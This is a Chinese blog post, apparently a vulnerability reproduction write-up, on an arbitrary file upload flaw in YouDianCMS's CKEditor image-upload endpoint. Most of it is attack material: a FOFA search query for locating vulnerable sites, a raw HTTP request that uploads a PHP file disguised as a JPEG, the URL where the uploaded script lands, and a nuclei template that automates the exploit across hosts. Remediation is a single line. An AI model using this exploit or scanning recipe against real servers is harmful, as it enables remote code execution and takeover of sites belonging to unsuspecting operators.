当前位置:   article > 正文

YouDianCMS 友点系统 CKEditor 任意文件上传_ckeditor漏洞

ckeditor漏洞

YouDianCMS 友点系统 CKEditor 任意文件上传漏洞复现

1.漏洞介绍

友点CMS存在任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件,获取服务器权限

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
-

4.检索特征

FOFA:app=“友点建站-CMS” && product=“友点建站-CMS”在这里插入图片描述

5.POC
POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Content-Length: 185
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2

--cadc403efc1ad12f5fcce44c172baad2
Content-Disposition: form-data; name="files"; filename="c.php"
Content-Type: image/jpg

<?php phpinfo();?>
--cadc403efc1ad12f5fcce44c172baad2--

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16

在这里插入图片描述
http://127.0.0.1/Public/image/uploads/1709524862134.php
在这里插入图片描述

nuclei脚本

id: YouDianCMS-upload

info:
  name: YouDianCMS-upload
  author: test
  severity: info
  description: description
  reference:
    - https://
  tags: tags

http:
  - raw:
      - |
        POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: close
        Content-Type: multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2
        Host: {{Hostname}}
        Content-Length: 179

        --cadc403efc1ad12f5fcce44c172baad2
        Content-Disposition: form-data; name="files"; filename="c.php"
        Content-Type: image/jpg

        <?php phpinfo();?>
        --cadc403efc1ad12f5fcce44c172baad2--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 
      - type: status
        status:
          - 200

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40

6.修复建议

更新到最新版本

7.参考信息

https://mp.weixin.qq.com/s/oiNffCThHJsfLhePlZjTBA

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小丑西瓜9/article/detail/456392
推荐阅读
相关标签
  

闽ICP备14008679号